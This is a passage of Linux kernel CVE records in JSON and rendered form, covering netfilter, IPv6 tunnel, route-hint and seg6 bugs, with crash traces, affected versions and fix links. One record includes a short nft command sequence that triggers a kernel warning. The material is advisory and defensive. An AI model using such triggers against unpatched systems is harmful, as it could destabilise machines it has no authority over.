"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: reject new basechain after table flag update\n\nWhen dormant flag is toggled, hooks are disabled in the commit phase by\niterating over current chains in table (existing and new).\n\nThe following configuration allows for an inconsistent state:\n\n add table x\n add chain x y { type filter hook input priority 0; }\n add table x { flags dormant; }\n add chain x w { type filter hook input priority 1; }\n\nwhich triggers the following warning when trying to unregister chain w\nwhich is already unregistered.\n\n[ 127.322252] WARNING: CPU: 7 PID: 1211 at net/netfilter/core.c:50 1 __nf_unregister_net_hook+0x21a/0x260\n[...]\n[ 127.322519] Call Trace:\n[ 127.322521] \u003cTASK\u003e\n[ 127.322524] ? __warn+0x9f/0x1a0\n[ 127.322531] ? __nf_unregister_net_hook+0x21a/0x260\n[ 127.322537] ? report_bug+0x1b1/0x1e0\n[ 127.322545] ? handle_bug+0x3c/0x70\n[ 127.322552] ? exc_invalid_op+0x17/0x40\n[ 127.322556] ? asm_exc_invalid_op+0x1a/0x20\n[ 127.322563] ? kasan_save_free_info+0x3b/0x60\n[ 127.322570] ? __nf_unregister_net_hook+0x6a/0x260\n[ 127.322577] ? __nf_unregister_net_hook+0x21a/0x260\n[ 127.322583] ? __nf_unregister_net_hook+0x6a/0x260\n[ 127.322590] ? __nf_tables_unregister_hook+0x8a/0xe0 [nf_tables]\n[ 127.322655] nft_table_disable+0x75/0xf0 [nf_tables]\n[ 127.322717] nf_tables_commit+0x2571/0x2620 [nf_tables]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:57.894Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6d12f21f8bbe23fde25b77c2bf5973c136b8bef8"
},
{
"url": "https://git.kernel.org/stable/c/41bad13c0e8a5a2b47a7472cced922555372daab"
},
{
"url": "https://git.kernel.org/stable/c/7b6fba6918714afee3e17796113ccab636255c7b"
},
{
"url": "https://git.kernel.org/stable/c/8ba81dca416adf82fc5a2a23abc1a8cc02ad32fb"
},
{
"url": "https://git.kernel.org/stable/c/745cf6a843896cdac8766c74379300ed73c78830"
},
{
"url": "https://git.kernel.org/stable/c/420132bee3d0136b7fba253a597b098fe15493a7"
},
{
"url": "https://git.kernel.org/stable/c/e95bb4cba94c018be24b11f017d1c55dd6cda31a"
},
{
"url": "https://git.kernel.org/stable/c/994209ddf4f430946f6247616b2e33d179243769"
}
],
"title": "netfilter: nf_tables: reject new basechain after table flag update",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35900",
"datePublished": "2024-05-19T08:34:54.016Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T09:07:57.894Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26665 (GCVE-0-2024-26665)
Vulnerability from cvelistv5
Published
2024-04-02 06:22
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tunnels: fix out of bounds access when building IPv6 PMTU error
If the ICMPv6 error is built from a non-linear skb we get the following
splat,
BUG: KASAN: slab-out-of-bounds in do_csum+0x220/0x240
Read of size 4 at addr ffff88811d402c80 by task netperf/820
CPU: 0 PID: 820 Comm: netperf Not tainted 6.8.0-rc1+ #543
...
kasan_report+0xd8/0x110
do_csum+0x220/0x240
csum_partial+0xc/0x20
skb_tunnel_check_pmtu+0xeb9/0x3280
vxlan_xmit_one+0x14c2/0x4080
vxlan_xmit+0xf61/0x5c00
dev_hard_start_xmit+0xfb/0x510
__dev_queue_xmit+0x7cd/0x32a0
br_dev_queue_push_xmit+0x39d/0x6a0
Use skb_checksum instead of csum_partial who cannot deal with non-linear
SKBs.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4cb47a8644cc9eb8ec81190a50e79e6530d0297f Version: 4cb47a8644cc9eb8ec81190a50e79e6530d0297f Version: 4cb47a8644cc9eb8ec81190a50e79e6530d0297f Version: 4cb47a8644cc9eb8ec81190a50e79e6530d0297f Version: 4cb47a8644cc9eb8ec81190a50e79e6530d0297f Version: 4cb47a8644cc9eb8ec81190a50e79e6530d0297f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.889Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e77bf828f1ca1c47fcff58bdc26b60a9d3dfbe1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d964dd1bc1452594b4207d9229c157d9386e5d8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e37cde7a5716466ff2a76f7f27f0a29b05b9a732"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/510c869ffa4068c5f19ff4df51d1e2f3a30aaac1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7dc9feb8b1705cf00de20563b6bc4831f4c99dab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d75abeec401f8c86b470e7028a13fcdc87e5dd06"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26665",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:43.558193Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:39.284Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_tunnel_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e77bf828f1ca1c47fcff58bdc26b60a9d3dfbe1d",
"status": "affected",
"version": "4cb47a8644cc9eb8ec81190a50e79e6530d0297f",
"versionType": "git"
},
{
"lessThan": "d964dd1bc1452594b4207d9229c157d9386e5d8a",
"status": "affected",
"version": "4cb47a8644cc9eb8ec81190a50e79e6530d0297f",
"versionType": "git"
},
{
"lessThan": "e37cde7a5716466ff2a76f7f27f0a29b05b9a732",
"status": "affected",
"version": "4cb47a8644cc9eb8ec81190a50e79e6530d0297f",
"versionType": "git"
},
{
"lessThan": "510c869ffa4068c5f19ff4df51d1e2f3a30aaac1",
"status": "affected",
"version": "4cb47a8644cc9eb8ec81190a50e79e6530d0297f",
"versionType": "git"
},
{
"lessThan": "7dc9feb8b1705cf00de20563b6bc4831f4c99dab",
"status": "affected",
"version": "4cb47a8644cc9eb8ec81190a50e79e6530d0297f",
"versionType": "git"
},
{
"lessThan": "d75abeec401f8c86b470e7028a13fcdc87e5dd06",
"status": "affected",
"version": "4cb47a8644cc9eb8ec81190a50e79e6530d0297f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_tunnel_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntunnels: fix out of bounds access when building IPv6 PMTU error\n\nIf the ICMPv6 error is built from a non-linear skb we get the following\nsplat,\n\n BUG: KASAN: slab-out-of-bounds in do_csum+0x220/0x240\n Read of size 4 at addr ffff88811d402c80 by task netperf/820\n CPU: 0 PID: 820 Comm: netperf Not tainted 6.8.0-rc1+ #543\n ...\n kasan_report+0xd8/0x110\n do_csum+0x220/0x240\n csum_partial+0xc/0x20\n skb_tunnel_check_pmtu+0xeb9/0x3280\n vxlan_xmit_one+0x14c2/0x4080\n vxlan_xmit+0xf61/0x5c00\n dev_hard_start_xmit+0xfb/0x510\n __dev_queue_xmit+0x7cd/0x32a0\n br_dev_queue_push_xmit+0x39d/0x6a0\n\nUse skb_checksum instead of csum_partial who cannot deal with non-linear\nSKBs."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:27.768Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e77bf828f1ca1c47fcff58bdc26b60a9d3dfbe1d"
},
{
"url": "https://git.kernel.org/stable/c/d964dd1bc1452594b4207d9229c157d9386e5d8a"
},
{
"url": "https://git.kernel.org/stable/c/e37cde7a5716466ff2a76f7f27f0a29b05b9a732"
},
{
"url": "https://git.kernel.org/stable/c/510c869ffa4068c5f19ff4df51d1e2f3a30aaac1"
},
{
"url": "https://git.kernel.org/stable/c/7dc9feb8b1705cf00de20563b6bc4831f4c99dab"
},
{
"url": "https://git.kernel.org/stable/c/d75abeec401f8c86b470e7028a13fcdc87e5dd06"
}
],
"title": "tunnels: fix out of bounds access when building IPv6 PMTU error",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26665",
"datePublished": "2024-04-02T06:22:14.264Z",
"dateReserved": "2024-02-19T14:20:24.149Z",
"dateUpdated": "2025-05-04T08:53:27.768Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36008 (GCVE-0-2024-36008)
Vulnerability from cvelistv5
Published
2024-05-20 09:48
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv4: check for NULL idev in ip_route_use_hint()
syzbot was able to trigger a NULL deref in fib_validate_source()
in an old tree [1].
It appears the bug exists in latest trees.
All calls to __in_dev_get_rcu() must be checked for a NULL result.
[1]
general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
CPU: 2 PID: 3257 Comm: syz-executor.3 Not tainted 5.10.0-syzkaller #0
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:fib_validate_source+0xbf/0x15a0 net/ipv4/fib_frontend.c:425
Code: 18 f2 f2 f2 f2 42 c7 44 20 23 f3 f3 f3 f3 48 89 44 24 78 42 c6 44 20 27 f3 e8 5d 88 48 fc 4c 89 e8 48 c1 e8 03 48 89 44 24 18 <42> 80 3c 20 00 74 08 4c 89 ef e8 d2 15 98 fc 48 89 5c 24 10 41 bf
RSP: 0018:ffffc900015fee40 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff88800f7a4000 RCX: ffff88800f4f90c0
RDX: 0000000000000000 RSI: 0000000004001eac RDI: ffff8880160c64c0
RBP: ffffc900015ff060 R08: 0000000000000000 R09: ffff88800f7a4000
R10: 0000000000000002 R11: ffff88800f4f90c0 R12: dffffc0000000000
R13: 0000000000000000 R14: 0000000000000000 R15: ffff88800f7a4000
FS: 00007f938acfe6c0(0000) GS:ffff888058c00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f938acddd58 CR3: 000000001248e000 CR4: 0000000000352ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
ip_route_use_hint+0x410/0x9b0 net/ipv4/route.c:2231
ip_rcv_finish_core+0x2c4/0x1a30 net/ipv4/ip_input.c:327
ip_list_rcv_finish net/ipv4/ip_input.c:612 [inline]
ip_sublist_rcv+0x3ed/0xe50 net/ipv4/ip_input.c:638
ip_list_rcv+0x422/0x470 net/ipv4/ip_input.c:673
__netif_receive_skb_list_ptype net/core/dev.c:5572 [inline]
__netif_receive_skb_list_core+0x6b1/0x890 net/core/dev.c:5620
__netif_receive_skb_list net/core/dev.c:5672 [inline]
netif_receive_skb_list_internal+0x9f9/0xdc0 net/core/dev.c:5764
netif_receive_skb_list+0x55/0x3e0 net/core/dev.c:5816
xdp_recv_frames net/bpf/test_run.c:257 [inline]
xdp_test_run_batch net/bpf/test_run.c:335 [inline]
bpf_test_run_xdp_live+0x1818/0x1d00 net/bpf/test_run.c:363
bpf_prog_test_run_xdp+0x81f/0x1170 net/bpf/test_run.c:1376
bpf_prog_test_run+0x349/0x3c0 kernel/bpf/syscall.c:3736
__sys_bpf+0x45c/0x710 kernel/bpf/syscall.c:5115
__do_sys_bpf kernel/bpf/syscall.c:5201 [inline]
__se_sys_bpf kernel/bpf/syscall.c:5199 [inline]
__x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5199
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 02b24941619fcce3d280311ac73b1e461552e9c8 Version: 02b24941619fcce3d280311ac73b1e461552e9c8 Version: 02b24941619fcce3d280311ac73b1e461552e9c8 Version: 02b24941619fcce3d280311ac73b1e461552e9c8 Version: 02b24941619fcce3d280311ac73b1e461552e9c8 Version: 02b24941619fcce3d280311ac73b1e461552e9c8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36008",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:05:40.708798Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:45.179Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.519Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7da0f91681c4902bc5c210356fdd963b04d5d1d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03b5a9b2b526862b21bcc31976e393a6e63785d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a25bfd12733a8f38f8ca47c581f876c3d481ac0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8240c7308c941db4d9a0a91b54eca843c616a655"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c71ea3534ec0936fc57e6fb271c7cc6a2f68c295"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7da0f91681c4902bc5c210356fdd963b04d5d1d4",
"status": "affected",
"version": "02b24941619fcce3d280311ac73b1e461552e9c8",
"versionType": "git"
},
{
"lessThan": "03b5a9b2b526862b21bcc31976e393a6e63785d1",
"status": "affected",
"version": "02b24941619fcce3d280311ac73b1e461552e9c8",
"versionType": "git"
},
{
"lessThan": "7a25bfd12733a8f38f8ca47c581f876c3d481ac0",
"status": "affected",
"version": "02b24941619fcce3d280311ac73b1e461552e9c8",
"versionType": "git"
},
{
"lessThan": "8240c7308c941db4d9a0a91b54eca843c616a655",
"status": "affected",
"version": "02b24941619fcce3d280311ac73b1e461552e9c8",
"versionType": "git"
},
{
"lessThan": "c71ea3534ec0936fc57e6fb271c7cc6a2f68c295",
"status": "affected",
"version": "02b24941619fcce3d280311ac73b1e461552e9c8",
"versionType": "git"
},
{
"lessThan": "58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1",
"status": "affected",
"version": "02b24941619fcce3d280311ac73b1e461552e9c8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: check for NULL idev in ip_route_use_hint()\n\nsyzbot was able to trigger a NULL deref in fib_validate_source()\nin an old tree [1].\n\nIt appears the bug exists in latest trees.\n\nAll calls to __in_dev_get_rcu() must be checked for a NULL result.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nCPU: 2 PID: 3257 Comm: syz-executor.3 Not tainted 5.10.0-syzkaller #0\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:fib_validate_source+0xbf/0x15a0 net/ipv4/fib_frontend.c:425\nCode: 18 f2 f2 f2 f2 42 c7 44 20 23 f3 f3 f3 f3 48 89 44 24 78 42 c6 44 20 27 f3 e8 5d 88 48 fc 4c 89 e8 48 c1 e8 03 48 89 44 24 18 \u003c42\u003e 80 3c 20 00 74 08 4c 89 ef e8 d2 15 98 fc 48 89 5c 24 10 41 bf\nRSP: 0018:ffffc900015fee40 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff88800f7a4000 RCX: ffff88800f4f90c0\nRDX: 0000000000000000 RSI: 0000000004001eac RDI: ffff8880160c64c0\nRBP: ffffc900015ff060 R08: 0000000000000000 R09: ffff88800f7a4000\nR10: 0000000000000002 R11: ffff88800f4f90c0 R12: dffffc0000000000\nR13: 0000000000000000 R14: 0000000000000000 R15: ffff88800f7a4000\nFS: 00007f938acfe6c0(0000) GS:ffff888058c00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f938acddd58 CR3: 000000001248e000 CR4: 0000000000352ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n ip_route_use_hint+0x410/0x9b0 net/ipv4/route.c:2231\n ip_rcv_finish_core+0x2c4/0x1a30 net/ipv4/ip_input.c:327\n ip_list_rcv_finish net/ipv4/ip_input.c:612 [inline]\n ip_sublist_rcv+0x3ed/0xe50 net/ipv4/ip_input.c:638\n ip_list_rcv+0x422/0x470 net/ipv4/ip_input.c:673\n __netif_receive_skb_list_ptype net/core/dev.c:5572 [inline]\n __netif_receive_skb_list_core+0x6b1/0x890 net/core/dev.c:5620\n __netif_receive_skb_list net/core/dev.c:5672 [inline]\n netif_receive_skb_list_internal+0x9f9/0xdc0 net/core/dev.c:5764\n netif_receive_skb_list+0x55/0x3e0 net/core/dev.c:5816\n xdp_recv_frames net/bpf/test_run.c:257 [inline]\n xdp_test_run_batch net/bpf/test_run.c:335 [inline]\n bpf_test_run_xdp_live+0x1818/0x1d00 net/bpf/test_run.c:363\n bpf_prog_test_run_xdp+0x81f/0x1170 net/bpf/test_run.c:1376\n bpf_prog_test_run+0x349/0x3c0 kernel/bpf/syscall.c:3736\n __sys_bpf+0x45c/0x710 kernel/bpf/syscall.c:5115\n __do_sys_bpf kernel/bpf/syscall.c:5201 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:5199 [inline]\n __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5199"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:24.352Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7da0f91681c4902bc5c210356fdd963b04d5d1d4"
},
{
"url": "https://git.kernel.org/stable/c/03b5a9b2b526862b21bcc31976e393a6e63785d1"
},
{
"url": "https://git.kernel.org/stable/c/7a25bfd12733a8f38f8ca47c581f876c3d481ac0"
},
{
"url": "https://git.kernel.org/stable/c/8240c7308c941db4d9a0a91b54eca843c616a655"
},
{
"url": "https://git.kernel.org/stable/c/c71ea3534ec0936fc57e6fb271c7cc6a2f68c295"
},
{
"url": "https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1"
}
],
"title": "ipv4: check for NULL idev in ip_route_use_hint()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36008",
"datePublished": "2024-05-20T09:48:07.596Z",
"dateReserved": "2024-05-17T13:50:33.152Z",
"dateUpdated": "2025-05-04T09:10:24.352Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26735 (GCVE-0-2024-26735)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: fix possible use-after-free and null-ptr-deref
The pernet operations structure for the subsystem must be registered
before registering the generic netlink family.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26735",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-16T14:17:44.078376Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-27T20:01:54.331Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-11-01T17:03:12.597Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/953f42934533c151f440cd32390044d2396b87aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/82831e3ff76ef09fb184eb93b79a3eb3fb284f1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65c38f23d10ff79feea1e5d50b76dc7af383c1e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/91b020aaa1e59bfb669d34c968e3db3d5416bcee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8391b9b651cfdf80ab0f1dc4a489f9d67386e197"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9e02973dbc6a91e40aa4f5d87b8c47446fbfce44"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/02b08db594e8218cfbc0e4680d4331b457968a9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5559cea2d5aa3018a5f00dd2aca3427ba09b386b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241101-0012/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "953f42934533c151f440cd32390044d2396b87aa",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
